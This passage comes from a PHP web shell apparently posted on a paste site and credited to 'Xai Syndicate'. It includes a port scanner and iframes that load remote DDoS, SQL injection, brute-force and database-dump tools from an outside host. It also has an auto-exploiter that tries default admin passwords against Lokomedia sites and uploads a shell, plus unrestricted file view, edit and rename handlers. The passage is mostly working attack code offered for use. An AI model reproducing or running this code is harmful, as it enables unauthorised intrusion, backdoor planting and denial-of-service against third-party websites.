  597. echo "# Upload Failed 1 <br># Uploading 2..<br>";
  598. $upload_ah = ngirim("$korban?cmd=upload", $post2);
  599. if(preg_match("/$nama_doang/", $upload_ah)) {
  600. echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  601. } else {
  602. echo "# Upload Failed 2<br><br>";
  603. }
  604. }
  605. }
  606. }elseif($_GET['do'] == 'ports') {
  607. echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
  608. echo '<div class="content">';
  609. echo '<form action="" method="post">';
  610.  
  611. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  612. $start = strip_tags($_POST['start']);
  613. $end = strip_tags($_POST['end']);
  614. $host = strip_tags($_POST['host']);
  615. for($i = $start; $i<=$end; $i++){
  616. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  617. if($fp){
  618. echo 'Port '.$i.' is <font color=green>open</font><br>';
  619. }
  620. flush();
  621. }
  622. } else {
  623. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  624. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  625. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  626. Host: <input type="text" name="host" value="localhost"/><br /><br />
  627. Port start: <input type="text" name="start" value="0"/><br /><br />
  628. Port end:<input type="text" name="end" value="5000"/><br /><br />
  629. <input type="submit" value="Scan Ports" />
  630. </form></center><br /><br />';
  631. echo '</div></table></td>';}
  632. } elseif($_GET['xai'] == 'admf') {
  633. echo "<iframe src='http://pertolonganpertama.com/admf.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  634.  
  635. } elseif($_GET['xai'] == 'popoji') {
  636. echo "<iframe src='http://pertolonganpertama.com/popoji.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  637.  
  638. } elseif($_GET['xai'] == 'webdav') {
  639. echo "<iframe src='http://pertolonganpertama.com/webdav.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  640.  
  641. } elseif($_GET['xai'] == 'bfmc') {
  642. echo "<iframe src='http://pertolonganpertama.com/bfmc.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  643.  
  644. } elseif($_GET['xai'] == 'dbdm') {
  645. echo "<iframe src='http://pertolonganpertama.com/dbdump.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  646.  
  647. } elseif($_GET['xai'] == 'hashid') {
  648. echo "<iframe src='http://pertolonganpertama.com/hashid.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  649.  
  650. } elseif($_GET['xai'] == 'ddos') {
  651. echo "<iframe src='http://pertolonganpertama.com/ddos.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  652.  
  653. } elseif($_GET['xai'] == 'jquery') {
  654. echo "<iframe src='http://pertolonganpertama.com/jquery.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  655.  
  656. } elseif($_GET['xai'] == 'whois') {
  657. echo "<iframe src='http://pertolonganpertama.com/whois.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  658.  
  659. } elseif($_GET['xai'] == 'ende') {
  660. echo "<iframe src='http://pertolonganpertama.com/ende.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  661.  
  662. } elseif($_GET['xai'] == 'wpbf') {
  663. echo "<iframe src='http://pertolonganpertama.com/wpbf.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  664.  
  665. } elseif($_GET['xai'] == 'sqli') {
  666. echo "<iframe src='http://pertolonganpertama.com/sqli.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  667.  
  668. } elseif($_GET['xai'] == 'tvon') {
  669. echo "<iframe src='http://pertolonganpertama.com/tvon.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  670.  
  671. } elseif($_GET['xai'] == 'bing') {
  672. echo "<iframe src='http://pertolonganpertama.com/bing.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  673.  
  674. } elseif($_GET['xai'] == 'pretashopa') {
  675. echo "<iframe src='http://pertolonganpertama.com/pretashopa.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  676.  
  677. } elseif($_GET['xai'] == 'twitter') {
  678. echo "<iframe src='http://pertolonganpertama.com/twitter.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  679.  
  680. } elseif($_GET['xai'] == 'contac') {
  681. echo "<iframe src='http://pertolonganpertama.com/contac.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  682. } elseif($_GET['xai'] == 'blog') {
  683. echo "<iframe src='http://www.loscardosmandoza.cf/' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  684. } elseif($_GET['xai'] == 'mirrorh') {
  685. echo "<iframe src='http://www.mirror-h.org/mass' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  686. } elseif($_GET['xai'] == 'tools') {
  687. echo "<iframe src='http://pertolonganpertama.com//' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  688. } elseif($_GET['xai'] == 'drupal') {
  689. echo "<iframe src='http://pertolonganpertama.com/drupal.php//' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  690. } elseif($_GET['xai'] == 'lokomedia') {
  691. function cek($url) {
  692. $ch = curl_init($url);
  693. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  694. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  695. $res = curl_exec($ch);
  696. curl_close($ch);
  697. return $res;
  698. }
  699. function curl($url,$payload) {
  700. $ch = curl_init($url);
  701. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  702. curl_setopt($ch, CURLOPT_POST, true);
  703. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  704. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  705. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  706. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  707. $res = curl_exec($ch);
  708. curl_close($ch);
  709. return $res;
  710. }
  711. echo "<center>
  712. <h1>&#x4c;&#x6f;&#x6b;&#x6f;&#x6d;&#x65;&#x64;&#x69;&#x61;&#x20;&#x41;&#x75;&#x74;&#x6f;&#x20;&#x54;&#x61;&#x6e;&#x61;&#x6d;&#x20;&#x53;&#x68;&#x65;&#x6c;&#x6c;</h1>
  713. <form method='post'>
  714. Domain: <br>
  715. <textarea placeholder='&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x77;&#x77;&#x77;&#x2e;&#x74;&#x61;&#x72;&#x67;&#x65;&#x74;&#x2e;&#x63;&#x6f;&#x6d;&#x2f;' name='url' style='width: 500px; height: 250px;'></textarea><br>
  716. <input type='submit' name='hajar' value='&#x5909;&#x4f53;'>
  717. </form>";
  718. if($_POST['hajar']) {
  719. $domain = explode("\r\n", $_POST['url']);
  720. $up = array(
  721. "admin" => "admin",
  722. "admin" => "123456",
  723. "xai" => "xaixploit",
  724. "admin" => "admin12345",
  725. "admin" => "admin123",
  726. "direktur" => "admin",
  727. );
  728. foreach($domain as $url) {
  729. foreach($up as $user => $pass) {
  730. $data1 = array(
  731. "username" => $user,
  732. "password" => $pass,
  733. );
  734. $login = curl($url."/adminweb/cek_login.php", $data1);
  735. if(preg_match("/Logout|Administrator/", $login)) {
  736. $file = "shellmu.php"; //1 dir dengan exploiternyaa
  737. $data2 = array(
  738. "judul" => "xaishell auto exploiter lokomedia",
  739. "fupload" => "@$file",
  740. "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;",
  741. );
  742. $ngirim = curl($url."/adminweb/modul/mod_download/aksi_download.php?module=download&act=input",$data);
  743. if(preg_match("/xaixploit auto exploiter lokomedia/i", $ngirim)) {
  744. echo "[+] $url -> <font color=green>sukses login [ user: $user pass: $pass ]</font><br>";
  745. $cek = cek("$url/files/image.php");
  746. if(preg_match("/xaixploit/", $cek)) {
  747. echo "[+] $url/files/image.php -> <font color=green>shelmu.</font><br><br>";
  748. } else {
  749. echo "[-] <font color='#bb0000'>shellmu gaada.</font><br><br>";
  750. }
  751. }
  752. } else {
  753. echo "[-] $url -> gagal login<br><br>";
  754. }
  755. }
  756. }
  757. }
  758. } elseif($_GET['act'] == 'view') {
  759. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  760. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  761. } elseif($_GET['act'] == 'edit') {
  762. if($_POST['save']) {
  763. $save = file_put_contents($_GET['file'], $_POST['src']);
  764. if($save) {
  765. $act = "<font color=lime>Saved!</font>";
  766. } else {
  767. $act = "<font color=red>permission denied</font>";
  768. }
  769. echo "".$act."<br>";
  770. }
  771. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  772. echo "<form method='post'>
  773. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  774. <input type='submit' value='Save' name='save' style='width: 500px;'>
  775. </form>";
  776. } elseif($_GET['act'] == 'rename') {
  777. if($_POST['do_rename']) {
  778. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  779. if($rename) {
  780. $act = "<script>window.location='?dir=".$dir."';</script>";
  781. } else {
  782. $act = "<font color=red>permission denied</font>";
  783. }
  784. echo "".$act."<br>";
  785. }
  786. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  787. echo "<form method='post'>
  788. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  789. <input type='submit' name='do_rename' value='rename'>
  790. </form>";
  791.  
  792.  
  793. echo "</table>";
  794. if(!is_readable($dir)) {
  795. //
  796. } else {
  797. echo "<hr>";
  798. }
  799.  
  800. }
  801. ?>
  802. <style>
  803. html,body{margin:0;padding:0;height:100%;font:13px Arial;}
  804. #wrapper{min-height:100%;position:relative;}
  805. #header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
  806. #body{padding-bottom:200px;padding-left:10px;}
  807. #footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
  808. text-align:center;color:#408080;}
  809. </style>
  810. </head>
  811. <body>
  812.  
  813. <div id="footer" color=Red size=3><b>Copyright &copy 2016 - Xai Syndicate<br></p></div>
  814.  
  815. <div id="footer" color=Red size=3><b>All Rights Reserved.</></div>
  816. </font>
  817. </body>
  818. </head>
  819. </html>
Add Comment
Please, Sign In to add comment